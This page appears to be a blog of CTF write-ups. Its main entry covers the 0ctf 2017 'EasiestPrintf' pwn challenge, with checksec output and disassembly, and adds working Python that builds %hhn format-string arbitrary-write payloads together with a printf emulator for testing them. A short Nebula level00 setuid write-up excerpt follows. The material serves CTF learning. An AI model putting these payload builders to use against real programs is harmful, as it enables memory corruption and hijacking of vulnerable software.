0ctf 2017 pwn challenge "EasiestPrintf": post-contest reflections

checksec

$ file EasiestPrintf
EasiestPrintf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=61cd88e3d189854473fddf7c0ace6450986e4b02, not stripped

$ checksec -f EasiestPrintf
RELRO        STACK CANARY   NX           PIE      RPATH      RUNPATH      FORTIFY  Fortified  Fortifiable  FILE
Full RELRO   Canary found   NX enabled   No PIE   No RPATH   No RUNPATH   Yes      0          6            EasiestPrintf

As you can see, the binary has Full RELRO (the GOT is read-only once loading finishes), stack canaries, a non-executable stack and so on enabled.

Program analysis

The main function hands us a 4-byte read from an arbitrary address, which can be used to obtain the libc base. After that there is a format string vulnerability in the leave function; once it has executed, the program exits immediately. 0xA0 bytes can be written here.

 80487ab:	83 c4 10             	add    $0x10,%esp
 80487ae:	c7 85 50 ff ff ff 00 	movl   $0x0,-0xb0(%ebp)
 80487b5:	00 00 00
 80487b8:	eb 49                	jmp    8048803 <leave+0x92>
 80487ba:	8b 85 50 ff ff ff    	mov    -0xb0(%ebp),%eax
 80487c0:	8d 95 54 ff ff ff    	lea    -0xac(%ebp),%edx
 80487c6:	01 d0                	add    %edx,%eax
 80487c8:	83 ec 04             	sub    $0x4,%esp
 80487cb:	6a 01                	push   $0x1
 80487cd:	50                   	push   %eax
 80487ce:	6a 00                	push   $0x0
 80487d0:	e8 bb fd ff ff       	call   8048590 <....

March 27, 2017 · 3 min · lyincc
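The primitive the leave() bug gives is a format-string write, and with Full RELRO the GOT is not a valid target, so the payload has to be sized and checked carefully. Below is an added example (my code, not from the original post or the challenge) of building a %hhn write payload and verifying it with a small printf emulator. It assumes a 32-bit little-endian target, that the formatted buffer sits on the stack at positional argument OFFSET (assumed value 7), and that the payload must fit the 0xA0-byte buffer the post mentions; the address and value it writes are constructed sample inputs, not anything taken from the binary.

```python
"""Format-string arbitrary write, the primitive the leave() bug gives.

Added example for the EasiestPrintf note; not code from the original post.
Assumptions (not taken from the post): the target is 32-bit little-endian,
the buffer printf() formats sits on the stack at positional argument OFFSET,
and the payload has to fit the 0xA0-byte buffer the post mentions. The
address and value used below are made-up sample inputs.
"""
import re
import struct

BUF_LEN = 0xA0  # bytes the post says can be written into the buffer
OFFSET = 7      # ASSUMED: positional index (%7$...) of the buffer's first word


def build_fmtstr_write(offset, writes, written=0):
    """Return a format string that stores each {addr: 32-bit value} with %hhn.

    Layout: all target addresses first (one per positional slot), then for
    each byte a '%<pad>c' that raises printf's character counter to the wanted
    byte and a '%<slot>$hhn' that stores the low byte of the counter there.
    `written` is the number of characters printf emitted before our buffer.
    """
    pairs = [(addr + k, (value >> (8 * k)) & 0xFF)
             for addr, value in writes.items() for k in range(4)]
    # Write the smallest byte first so the counter only ever needs to grow;
    # the % 256 below handles the single wrap-around at the start.
    pairs.sort(key=lambda p: p[1])
    addr_part = b""
    for addr, _ in pairs:
        packed = struct.pack("<I", addr)
        if 0x00 in packed or 0x25 in packed:      # NUL ends the string, '%' is a directive
            raise ValueError(f"address {addr:#x} cannot appear literally in a format string")
        addr_part += packed
    counter = written + len(addr_part)           # the addresses are printed as-is
    fmt = ""
    for slot, (_, byte) in enumerate(pairs, start=offset):
        pad = (byte - counter) % 256
        if pad:                                   # %0c is invalid, so skip empty padding
            fmt += f"%{pad}c"                     # %Nc emits exactly N characters
            counter += pad
        fmt += f"%{slot}$hhn"                     # store counter & 0xff at the address in this slot
    payload = addr_part + fmt.encode()
    if len(payload) > BUF_LEN:
        raise ValueError(f"payload is {len(payload)} bytes, buffer holds {BUF_LEN}")
    return payload


DIRECTIVE = re.compile(rb"%(?:(\d+)\$)?(\d*)(hh|h|)([cn])")


def emulate_printf(fmt, stack, mem):
    """Emulate just enough of printf to check a payload: %[N]c and %[k$][hh|h]n.

    stack[i] is printf's argument i+1 (32-bit words); mem maps address -> byte.
    Directives without a k$ position consume arguments sequentially from
    argument 1, as glibc does when positional and sequential forms are mixed.
    Returns the number of characters printf would have emitted.
    """
    count, seq, i = 0, 0, 0
    while i < len(fmt):
        if fmt[i] != 0x25:                        # ordinary byte, emitted as-is
            count += 1
            i += 1
            continue
        if fmt[i:i + 2] == b"%%":
            count += 1
            i += 2
            continue
        m = DIRECTIVE.match(fmt, i)
        if not m:
            raise ValueError(f"unsupported directive at offset {i}: {fmt[i:i + 8]!r}")
        pos, width, length, conv = m.groups()
        if pos:
            arg = stack[int(pos) - 1]
        else:
            arg = stack[seq]
            seq += 1
        if conv == b"c":
            count += max(int(width or 1), 1)      # the char itself, padded to width
        else:
            size = {b"hh": 1, b"h": 2, b"": 4}[length]
            for k in range(size):                 # %n stores the running count, little-endian
                mem[arg + k] = (count >> (8 * k)) & 0xFF
        i = m.end()
    return count


def check_write(offset, addr, value):
    """Build a payload for {addr: value}, run it through the emulator with the
    payload sitting at positional slot `offset`, and return the 32-bit value
    that ended up at addr."""
    payload = build_fmtstr_write(offset, {addr: value})
    padded = payload.ljust(-(-len(payload) // 4) * 4, b"\0")
    stack = [0] * (offset - 1) + list(struct.unpack(f"<{len(padded) // 4}I", padded))
    mem = {}
    emulate_printf(payload, stack, mem)
    return int.from_bytes(bytes(mem.get(addr + k, 0) for k in range(4)), "little")


if __name__ == "__main__":
    sample_addr, sample_value = 0x0804A01C, 0xDEADBEEF   # constructed sample, not from the binary
    print(build_fmtstr_write(OFFSET, {sample_addr: sample_value}))
    print(hex(check_write(OFFSET, sample_addr, sample_value)))
```

The emulator is there so the payload can be checked offline before it is sent: the byte order, the wrap-around of the counter and the NUL/'%' restriction on literal addresses are exactly the things that silently break a real attempt. Where to point the write (the post is cut off before that) is a separate question; with the GOT read-only it has to be something in libc or on the stack that is still used between printf and exit.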

Nebula security challenge environment WriteUp

Download Nebula level00 About This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page. To access this level, log in as level00 with the password of level00. Source code There is no source code available for this level...

September 15, 2016 · 6 min · lyincc